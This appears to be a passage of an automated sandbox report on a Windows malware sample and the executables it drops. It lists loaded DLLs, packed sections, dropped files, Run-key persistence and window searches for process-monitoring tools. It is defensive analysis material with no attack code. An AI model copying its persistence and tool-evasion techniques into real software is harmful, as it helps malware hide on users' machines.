Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Section loaded: napinsp.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 3032576 > 1048576

Source: file.exe

Static PE information: Raw size of zopdawvw is bigger than: 0x100000 < 0x2b2a00

Source:	Binary string: mozglue.pdbP source: 6523f73121.exe, 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: nss3.pdb@ source: 6523f73121.exe, 00000009.00000002.3700948698.000000006D77F000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: nss3.pdb source: 6523f73121.exe, 00000009.00000002.3700948698.000000006D77F000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: mozglue.pdb source: 6523f73121.exe, 00000009.00000002.3699400594.000000006D5BD000.00000002.00000001.01000000.00000020.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.ea0000.0.unpack :EW;.rsrc:W;.idata :W;zopdawvw:EW;hctdavsk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;zopdawvw:EW;hctdavsk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.120000.0.unpack :EW;.rsrc:W;.idata :W;zopdawvw:EW;hctdavsk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;zopdawvw:EW;hctdavsk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.120000.0.unpack :EW;.rsrc:W;.idata :W;zopdawvw:EW;hctdavsk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;zopdawvw:EW;hctdavsk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Unpacked PE file: 8.2.1c8dd6ecf9.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hraxhmin:EW;dhruiwut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hraxhmin:EW;dhruiwut:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Unpacked PE file: 9.2.6523f73121.exe.5d0000.0.unpack :EW;.rsrc:W;.idata :W;assqlaww:EW;blchljdg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;assqlaww:EW;blchljdg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Unpacked PE file: 10.2.1c8dd6ecf9.exe.660000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hraxhmin:EW;dhruiwut:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hraxhmin:EW;dhruiwut:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Unpacked PE file: 30.2.4fe110f830.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;giuvursf:EW;cwujweuv:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Unpacked PE file: 31.2.6523f73121.exe.5d0000.0.unpack :EW;.rsrc:W;.idata :W;assqlaww:EW;blchljdg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;assqlaww:EW;blchljdg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Unpacked PE file: 46.2.4fe110f830.exe.3f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;giuvursf:EW;cwujweuv:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: random[2].exe.6.dr

Static PE information: 0xF456CF88 [Wed Nov 25 22:45:28 2099 UTC]

Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe

Code function: 9_2_6D5A55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

9_2_6D5A55F0

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 1c8dd6ecf9.exe.6.dr	Static PE information: real checksum: 0x1c7b26 should be: 0x1b95d0
Source: random[1].exe.6.dr	Static PE information: real checksum: 0x1c7b26 should be: 0x1b95d0
Source: 1fa18d372f.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x324fc1
Source: random[1].exe2.6.dr	Static PE information: real checksum: 0x1a7086 should be: 0x1a9e8a
Source: 6523f73121.exe.6.dr	Static PE information: real checksum: 0x2d6152 should be: 0x2cf982
Source: 4fe110f830.exe.6.dr	Static PE information: real checksum: 0x1a7086 should be: 0x1a9e8a
Source: 7z.exe.38.dr	Static PE information: real checksum: 0x0 should be: 0x7b29e
Source: file.exe	Static PE information: real checksum: 0x2e993d should be: 0x2e6e4a
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x2e993d should be: 0x2e6e4a
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x2d6152 should be: 0x2cf982
Source: random[2].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x324fc1
Source: 7z.dll.38.dr	Static PE information: real checksum: 0x0 should be: 0x1a2c6b

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: zopdawvw
Source: file.exe	Static PE information: section name: hctdavsk
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: zopdawvw
Source: skotes.exe.0.dr	Static PE information: section name: hctdavsk
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: .idata
Source: random[1].exe.6.dr	Static PE information: section name:
Source: random[1].exe.6.dr	Static PE information: section name: hraxhmin
Source: random[1].exe.6.dr	Static PE information: section name: dhruiwut
Source: random[1].exe.6.dr	Static PE information: section name: .taggant
Source: 1c8dd6ecf9.exe.6.dr	Static PE information: section name:
Source: 1c8dd6ecf9.exe.6.dr	Static PE information: section name: .idata
Source: 1c8dd6ecf9.exe.6.dr	Static PE information: section name:
Source: 1c8dd6ecf9.exe.6.dr	Static PE information: section name: hraxhmin
Source: 1c8dd6ecf9.exe.6.dr	Static PE information: section name: dhruiwut
Source: 1c8dd6ecf9.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe0.6.dr	Static PE information: section name:
Source: random[1].exe0.6.dr	Static PE information: section name: .idata
Source: random[1].exe0.6.dr	Static PE information: section name: assqlaww
Source: random[1].exe0.6.dr	Static PE information: section name: blchljdg
Source: random[1].exe0.6.dr	Static PE information: section name: .taggant
Source: 6523f73121.exe.6.dr	Static PE information: section name:
Source: 6523f73121.exe.6.dr	Static PE information: section name: .idata
Source: 6523f73121.exe.6.dr	Static PE information: section name: assqlaww
Source: 6523f73121.exe.6.dr	Static PE information: section name: blchljdg
Source: 6523f73121.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe2.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name: .idata
Source: random[1].exe2.6.dr	Static PE information: section name:
Source: random[1].exe2.6.dr	Static PE information: section name: giuvursf
Source: random[1].exe2.6.dr	Static PE information: section name: cwujweuv
Source: random[1].exe2.6.dr	Static PE information: section name: .taggant
Source: 4fe110f830.exe.6.dr	Static PE information: section name:
Source: 4fe110f830.exe.6.dr	Static PE information: section name: .idata
Source: 4fe110f830.exe.6.dr	Static PE information: section name:
Source: 4fe110f830.exe.6.dr	Static PE information: section name: giuvursf
Source: 4fe110f830.exe.6.dr	Static PE information: section name: cwujweuv
Source: 4fe110f830.exe.6.dr	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EBD91C push ecx; ret	0_2_00EBD92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00EB1359 push es; ret	0_2_00EB135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0013D91C push ecx; ret	2_2_0013D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_0013D91C push ecx; ret	3_2_0013D92F
Source: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Code function: 9_2_6D57B536 push ecx; ret	9_2_6D57B549

Source: file.exe	Static PE information: section name: entropy: 7.986926431712589
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.986926431712589
Source: random[1].exe.6.dr	Static PE information: section name: entropy: 7.988487638420711
Source: random[1].exe.6.dr	Static PE information: section name: hraxhmin entropy: 7.953018774637906
Source: 1c8dd6ecf9.exe.6.dr	Static PE information: section name: entropy: 7.988487638420711
Source: 1c8dd6ecf9.exe.6.dr	Static PE information: section name: hraxhmin entropy: 7.953018774637906
Source: random[1].exe2.6.dr	Static PE information: section name: entropy: 7.763188070942061
Source: random[1].exe2.6.dr	Static PE information: section name: giuvursf entropy: 7.953659367595919
Source: 4fe110f830.exe.6.dr	Static PE information: section name: entropy: 7.763188070942061
Source: 4fe110f830.exe.6.dr	Static PE information: section name: giuvursf entropy: 7.953659367595919

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1017482001\1fa18d372f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1017481001\9bc4f8a43d.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1017478001\6523f73121.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1017479001\dfa5c95181.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1017480001\4fe110f830.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 4fe110f830.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dfa5c95181.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6523f73121.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1c8dd6ecf9.exe	Jump to behavior

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1017477001\1c8dd6ecf9.exe	Window searched: window name: FilemonClass	Jump to behavior
